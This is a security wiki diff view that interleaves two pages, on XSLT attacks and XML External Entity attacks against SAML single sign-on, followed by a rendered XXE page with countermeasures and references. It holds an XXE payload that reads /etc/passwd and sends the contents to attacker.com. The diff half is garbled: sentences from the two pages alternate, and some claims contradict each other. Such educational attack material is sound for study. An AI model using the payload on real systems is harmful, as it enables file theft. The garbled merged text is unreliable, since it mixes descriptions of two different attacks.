XSLT Attack and XML External Entity Attack: Difference between pages

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=Attack description=
=Introduction=
''Extensible Stylesheet Language Transformation (XSLT)'' is a language for transforming XML documents into other documents, for example, XML, HTML, JSON or even PDF. The XML Signature standard allows the usage of ''XSLT'' by definition, and thus, ''XSLT'' can be used in [http://www.sso-attacks.org/index.php?title=SAML SAML]. ''XSLT'' is a Turing complete language. By this means, it is possible to use XSLT, for example, to read/write files on the local filesystem and send them over the Internet. Furthermore, the ''XSLT'' transformation will be executed before the digital signature is verified. Thus, an attacker can send a ''SAML'' token including a digital signature containing the ''XSLT Attack (XSLTA)'' vector, but it is not required that the signature is valid.
XML offers the possibility to describe the document’s structure by using a [https://en.wikipedia.org/wiki/Document_type_definition ''Document Type Definition (DTD)'']. Unfortunately, the usage of these features can lead to security vulnerabilities enabling very efficient [https://en.wikipedia.org/wiki/Denial-of-service_attack ''Denial-of-Service attacks (DoS)''] or allowing unauthorized access to files stored on the target ''Software-as-a-Service Cloud Provider (SaaS-CP)'', for example, ''/etc/passwd'' or key files.
 
The attacker sends an XML document containing an Entity, which points to a file stored on the local filesystem. The vulnerable application parses
XSLTA allows accessing files within the context of the used web server.
the XML document and processes the defined DTD. The DTD contains an External Entity reading a resource from the filesystem, in this case the ''/etc/passwd'' file, and sends the content to the attacker.
As a result the attacker breaks out of the usual processing schema and bypasses the security verification provided by the SSO-Verificator plus ''Authorization & Access Managment (AAM)'' and reads locally stored files.


=Attack subtypes=
=Attack subtypes=
There are no attack subtypes for this attack.
There are no attack subtypes for this attack.


=Prerequisites=
In order to start ''XML External Entity attack (XXEA)'', the attacker only has to create a valid XML message containing a DTD. Note that the message does not have to be a [http://www.sso-attacks.org/SAML SAML] token.
=Target=
[[File:Target_Parser.jpg|centre|600px]]
<br> The attacked Single Sign-On component is marked in red colour.


=Description=
[[File:XEEA.jpg|centre|600px]]


=Prerequisites for attack=
An example exploit is shown in Listing 1. The XML message contains two External Entities. The first Entity ('''file''') will read the content of the protected resource. The second Entity ('''send''') is used to send this content to a web server controlled by the attacker via a ''GET'' parameter. If the ''SaaS-CP'' reflects the content of the file Entity in the HTML response, which will be automatically displayed in the attacker’s browser, the send Entity is unnecessary. However, this is rarely the case for ''SAML'' token verification.
In order to start XSLT, the attacker has to create a valid XML message containing a [https://en.wikipedia.org/wiki/Document_type_definition DTD]. Note, that the message has to be a SAML token. However, this token does not have to be signed with a valid key nor the signature needs to be valid.


=Graphical representation of attack=
''XXEA'' allows an attacker to read arbitrary files within the context of the used web server. Particularly, it is possible to read configuration and SSL keystore files.
[[File:XSLT.jpg|centre]]


<source lang=xml>


<?xml version="1.0" encoding="utf-􀀀8"?>
<!DOCTYPE Response [
<!ENTITY file SYSTEM "/etc/passwd">
<!ENTITY send SYSTEM "http://attacker.com/?read=&file;">
]>
<samlp:Response>
  <attack>&send;</attack>
</samlp:Response>


=Attack example=
</source>
The attacker prepares a SAML token ''t'' and creates an XML Signature for it. Note, that it is not important to have a correctly computed signature value – the ''XSLTA'' only requires a well-formed XML document. The attacker adds a '''Transform''' element to the XML Signature and places the '''XSLT Payload''' in it as shown in Figure.
Listing 1: XML message containing the XXE attack vector.


[[File:XSLT1.jpg|centre]]
The listing only sketches the concept of the attack. The code as shown will not work on most XML parsers, because the usage of the External Entity file within the External Entity send is not allowed.


The attacker reads an arbitrary file using ''XSLT'' (in this example by using the ''unparsed-text()'' function). Afterwards, he forwards the contents of the file to his own server via a ''GET'' parameter.
=Mitigation / Countermeasures=
To prohibit ''XXEA'', the processing of ''DTD''s should be disabled. XML Schema can be used to verify the structure of XML messages.


=Attack mitigation / countermeasures=
=Practical Examples=
The attack targets the [https://en.wikipedia.org/wiki/Single_sign-on SSO] Verificator. The SSO Verificator should mitigate the usage of ''XSLT'' within the token.
In 2014, Mainka et al. analyzed 22 Software as a Service cloud providers and found out that several frameworks were vulnerable to this attack, as shown in the picture bellow.
[[File:Study table.png|centre|200px]]


=Practical Attack Examples=
In 2014, Mainka et al. analyzed 22 Software as a Service cloud providers and found out that one framework was vulnerable to this attack: Instructure


[[Category:Attack_Categorisation_By_Attacker_Model:_Message_generation_attacks]]
[[Category:Attack_Categorisation_By_Attacker_Model:_Message_generation_attacks]]
[[Category:Attack_Categorisation_By_Violated_Security_Objective_Confidentiality]]
[[Category:Attack_Categorisation_By_Violated_Security_Objective_Confidentiality]]
[[Category:Attack_Categorisation_By_Attack_on_IdP/_SP:_Attack_on_SP]]
[[Category:Attack_Categorisation_By_Attack_on_IdP/_SP:_Attack_on_SP_and_IdP]]
[[Category:Attack_Categorisation_By_Attack_Spreading:Application_Specific_Flaws]]
[[Category:Attack_Categorisation_By_Attacked_Web_Service_Component:_XML_Parser]]
[[Category:Attack_Categorisation_By_Attacked_Web_Service_Component:_XML_Parser]]
[[Category:Attack_Categorisation_By_Attack_Spreading:_Application_Specific_Flaws]]
[[Category:Attack_Categorisation_By_Attack_on_SAML]]


=References=
=References=
C. Mainka, V. Mladenov, F. Feldmann, J. Krautwald, J. Schwenk (2014): Your Software at my Service: Security Analysis of SaaS Single Sign-On Solutions in the Cloud. In The ACM Cloud Computing Security Workshop (CCSW).
C. Mainka, V. Mladenov, F. Feldmann, J. Krautwald, J. Schwenk (2014): Your Software at my Service: Security Analysis of SaaS Single Sign-On Solutions in the Cloud. In The ACM Cloud Computing Security Workshop (CCSW).<br>
Andreas Falkenberg, Christian Mainka, Juraj Somorovsky, and Jorg Schwenk. A New Approach towards DoS Penetration Testing on Web Services. 2013 IEEE 20th International Conference on Web Services, 0:491–498, 2013.
<br> [http://web-in-security.blogspot.de/2014/11/detecting-and-exploiting-xxe-in-saml.html Christian Mainka. Detecting and exploiting XXE in SAML Interfaces, 2014.]
<br>
[http://ws-attacks.org/index.php/XML_External_Entity_DOS XML External Entity DOS]
<br>
[http://http://ws-attacks.org/index.php/XML_Entity_Expansion XML Entity Expansion]
<br>
[http://web-in-security.blogspot.de/2014/11/detecting-and-exploiting-xxe-in-saml.html Detecting and exploting XXE in Saml]

Revision as of 18:47, 26 January 2016

Introduction

XML offers the possibility to describe the document’s structure by using a Document Type Definition (DTD). Unfortunately, the usage of these features can lead to security vulnerabilities enabling very efficient Denial-of-Service attacks (DoS) or allowing unauthorized access to files stored on the target Software-as-a-Service Cloud Provider (SaaS-CP), for example, /etc/passwd or key files. The attacker sends an XML document containing an Entity, which points to a file stored on the local filesystem. The vulnerable application parses the XML document and processes the defined DTD. The DTD contains an External Entity reading a resource from the filesystem, in this case the /etc/passwd file, and sends the content to the attacker. As a result the attacker breaks out of the usual processing schema and bypasses the security verification provided by the SSO-Verificator plus Authorization & Access Managment (AAM) and reads locally stored files.

Attack subtypes

There are no attack subtypes for this attack.

Prerequisites

In order to start XML External Entity attack (XXEA), the attacker only has to create a valid XML message containing a DTD. Note that the message does not have to be a SAML token.

Target


The attacked Single Sign-On component is marked in red colour.

Description

An example exploit is shown in Listing 1. The XML message contains two External Entities. The first Entity (file) will read the content of the protected resource. The second Entity (send) is used to send this content to a web server controlled by the attacker via a GET parameter. If the SaaS-CP reflects the content of the file Entity in the HTML response, which will be automatically displayed in the attacker’s browser, the send Entity is unnecessary. However, this is rarely the case for SAML token verification.

XXEA allows an attacker to read arbitrary files within the context of the used web server. Particularly, it is possible to read configuration and SSL keystore files. 

<?xml version="1.0" encoding="utf-􀀀8"?>
<!DOCTYPE Response [
<!ENTITY file SYSTEM "/etc/passwd">
<!ENTITY send SYSTEM "http://attacker.com/?read=&file;">
]>
<samlp:Response>
  <attack>&send;</attack>
</samlp:Response>

Listing 1: XML message containing the XXE attack vector.

The listing only sketches the concept of the attack. The code as shown will not work on most XML parsers, because the usage of the External Entity file within the External Entity send is not allowed.

Mitigation / Countermeasures

To prohibit XXEA, the processing of DTDs should be disabled. XML Schema can be used to verify the structure of XML messages.

Practical Examples

In 2014, Mainka et al. analyzed 22 Software as a Service cloud providers and found out that several frameworks were vulnerable to this attack, as shown in the picture bellow.

References

C. Mainka, V. Mladenov, F. Feldmann, J. Krautwald, J. Schwenk (2014): Your Software at my Service: Security Analysis of SaaS Single Sign-On Solutions in the Cloud. In The ACM Cloud Computing Security Workshop (CCSW).
Andreas Falkenberg, Christian Mainka, Juraj Somorovsky, and Jorg Schwenk. A New Approach towards DoS Penetration Testing on Web Services. 2013 IEEE 20th International Conference on Web Services, 0:491–498, 2013.
Christian Mainka. Detecting and exploiting XXE in SAML Interfaces, 2014.
XML External Entity DOS
XML Entity Expansion
Detecting and exploting XXE in Saml

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